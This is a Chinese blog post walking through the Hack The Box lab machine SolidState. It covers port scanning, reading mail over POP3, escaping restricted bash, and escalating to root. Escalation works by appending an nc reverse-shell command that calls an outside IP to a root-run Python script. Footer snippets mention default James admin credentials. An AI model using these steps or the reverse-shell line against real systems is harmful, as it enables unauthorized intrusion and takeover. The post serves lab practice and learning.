【Hack The Box】linux练习-- SolidState

最新推荐文章于 2024-01-13 23:30:04 发布
最新推荐文章于 2024-01-13 23:30:04 发布
阅读量413 收藏
点赞数
分类专栏: Hack The Box 文章标签: linux bash debian Hack The Box
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_65527369/article/details/127772349
版权

HTB 学习笔记

【Hack The Box】linux练习-- SolidState

🔥系列专栏:Hack The Box
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年11月9日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!

文章目录

在这里插入图片描述

信息收集

22/tcp  open  ssh     OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 770084f578b9c7d354cf712e0d526d8b (RSA)
|   256 78b83af660190691f553921d3f48ed53 (ECDSA)
|_  256 e445e9ed074d7369435a12709dc4af76 (ED25519)
25/tcp  open  smtp?
|_smtp-commands: Couldn't establish connection on port 25
80/tcp  open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
110/tcp open  pop3?
119/tcp open  nntp?
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:

web枚举

只有这一个邮箱有点价值

webadmin@solid-state-security.com

pop3枚举

在这里插入图片描述发现有james
在这里插入图片描述我做过,在我的笔记中找到
在这里插入图片描述重置mindy密码

pop3

telnet [ip] 110
list
retr 1
retr 2
在这里插入图片描述再获得两个重要信息
James
mailadmin

在这里插入图片描述还有一个ssh账号密码

rbash绕过

在这里插入图片描述发现是rbash在这里插入图片描述可以-t 执行命令
在这里插入图片描述这两种都可以,我都试了

ssh mindy@10.129.12.180 -t "bash --noprofile"

python -c 'import pty;pty.spawn("/bin/bash");'

在这里插入图片描述在我使用linpeas.sh枚举的时间里,我也同时找了一下可读写的文件

find / -perm 777 -type f 2>/dev/null

在这里插入图片描述去看了一下,是root运行的,我们直接写一个反弹shell 即可

然后等着就行

echo "os.system('/bin/nc -e /bin/bash 10.10.15.82 8001')" >> tmp.py

在这里插入图片描述

人间体佐菲
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
hackthebox-solidstate(考点:Apache James安全/受限制的rbash/ linux修改脚本)
冬萍子癸水
04-12 342
nmap 80看看没啥,dirbuster也没扫出啥有价值的 再看nmap的端口扫描结果,出现了James端口,网上搜搜,很快明白了可能存在的漏洞,这篇文章说了默认登录信息是端口4555的root:root,文章下面还写了一些操作命令 连接它,并列举出用户信息,最后把每个用户的密码都重置为666 telnet 10.10.10.51 4555 listusers setpassword mi...
Hack the box靶机 SolidState
菜浪马废的博客
05-20 330
有可以用的漏洞 但是需要账户 什么也没有 看一下4555的管理服务 goole一下初始密码 root:root 以为可以ssh了 发现只能pop 给了账号连ssh mindy:P@55W0rd1!2@ 天啊,直接ssh可以查看root.txt 看一眼walkthrough 不太对劲啊 我没提权 重置一下机器 rbash绕过 这才对 找了半天也没啥东西 上les.py找一下 蒙蔽了 一大堆信息 看不过来都 一个有root权限的py脚本 删除/tmp文件的脚本 那直接替换 变蓝了是因为刚才.
No.115-HackTheBox-Linux-SolidState-Walkthrough渗透学习
qq_34801745的博客
05-26 308
** HackTheBox-Linux-Miral-Walkthrough ** 靶机地址:https://www.hackthebox.eu/home/machines/profile/85 靶机难度:中级(4.5/10) 靶机发布日期:2017年10月18日 靶机描述: SolidState is a medium difficulty machine that requires chaining of multiple attack vectors in order to get a privileg
HTB打靶日记:Brainfuck
m0_73998094的博客
12-25 796
HTB打靶日记:Brainfuck
靶场实战(1):OSCP备考之VulnHub SolidState
最新发布
CTFSecret的博客
01-13 919
把可以访问的文件、目录都访问一下。同时尝试robots.txt,sitemap.xml等,没有找到有用信息,因此80端口暂时放弃。---------------------上述邮件中获取有用信息:SSH登录账号和密码。mindy进入修改/opt/tmp.py,命令都乱行,因此需要获取完美SHELL。nc的换行是\n,windows的换行是\r\n,nc的命令需要增加参数C。25,110,119,4555都是与邮件协议有关。登录每个用户邮箱,查看是否存在有用信息。检查页面源码,隐藏入口,注释等等。
solidstate-wordpress:固态-WordPress主题
03-15
固态(Wordpress) ... 出于任何目的,此主题都归类为个人博客主题。 预览 现场演示: : 特征 自定义Wordpress定制器中的所有内容,包括: 头版图标 头版介绍会 ...创建两个空页面,一个命名为Blog(最好将其永久链接...
solidstate-homepage-clone:克隆主页,固态,utilizando HTML,CSS和JavaScript
02-09
:gear_selector: 普罗耶托网页的主页。 :airplane_selector: 技术HTML CSS JavaScript :desktop_computer_selector: 结果 Confira o resultado:
智能鱼缸控制系统-电路方案
04-20
AQH3213 SolidState继电器× 1 PCB螺钉端子× 1 插座× 1 13A插头× 1 3Amp保险丝× 1 0.33A表面贴装型自恢复保险丝,240V ac / dc× 1 母头8位1排(0.1“)× 1 原型PCB板4厘米x 6厘米双面× 1 软件应用程序和在线...
具有10.5 W单频输出的谐振泵浦1645 nm Er:YAG非平面环形振荡器
03-18
我们演示了由光纤激光器共振泵浦的单频Er:YAG非平面环形振荡器(NPRO)。 通过优化Er:YAG NPRO的参数,可获得高达10.5 W的单频激光输出,其斜率效率为60.03%。 在10.5 W的输出功率下,Er:YAG NPRO的M-2-因子在x...
20个固态继电器(SSR)的应用详解
01-20
固态继电器(亦称固体继电器)英文名称为SolidState Relay,简称SSR。它是用半导体器件代替传统电接点作为切换装置的具有继电器特性的无触点开关器件,单相SSR为四端有源器件,其中两个输入控制端,两个输出端,输入...
实战打靶集锦-002-SolidState
阿尔泰野狼的博客
01-21 1375
本文记述了博主打靶的心路历程。
Hack The Boxlinux练习-- Brainfuck
人间体佐菲的博客
11-08 914
Hack The Boxlinux练习-- Brainfuck
DAY29(DAY30拓展):Vulnhub--靶机实战
qq_49433473的博客
08-12 2187
Vulnhub DC-1、DC-2靶机通关手册
Metasploit(学习笔记)
zhaji001
08-07 5161
之前阅读了《Metasploit渗透测试指南》准备更深入了解。 MSF终端命令: (kali 中Tab键自动补全) show exploits   列出框架中的渗透攻击模块 show  payloads  列出框架中攻击载荷 show auxiliary   列出框架中辅助攻击模块 search  name  查找框架中攻击模块 info 显示模块的信息 use name  选择要使...
htb-bastion
qq_45766062的博客
02-22 642
bastion介绍 这是一个运行windows的机器,并且可以连ssh。 nmap 先是nmap扫一下: Nmap scan report for 10.10.10.134 Host is up (0.32s latency). Not shown: 994 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH for_Windows_7.9 (proto
Couldn't connect to host, port: smtp.alibaba.com, 25错误解决办法
tb_520的博客
06-30 5906
com.sun.mail.util.MailConnectException: Couldn't connect to host, port: smtp.alibaba.com, 25; timeout -1; nested exception is: java.net.ConnectException: Connection timed out (Connection timed o...
利用javamail去连接smtp协议,报错Couldn't connect to host, port: smtp.alibaba.com, 25(阿里邮箱)
qq_26797239的博客
07-16 9956
做了一个邮箱系统,来收发用户的邮件。 我们使用的服务器是阿里云的服务器来部署项目。今天有个用户来我们平台绑定阿里邮箱。结果后台报错如下(在本地测试,是不报错的。): DEBUG POP3: connecting to host "pop.alibaba.com", port 110, isSSL false +OK AliYun POP3 v0.1.1 server ready CAPA +...
Hack The Boxlinux练习-- beep
人间体佐菲的博客
11-09 348
Hack The Boxlinux练习-- beep
HTB-SolidState
qq_42488061的博客
08-29 1019
HTB-SolidState
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

人间体佐菲

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值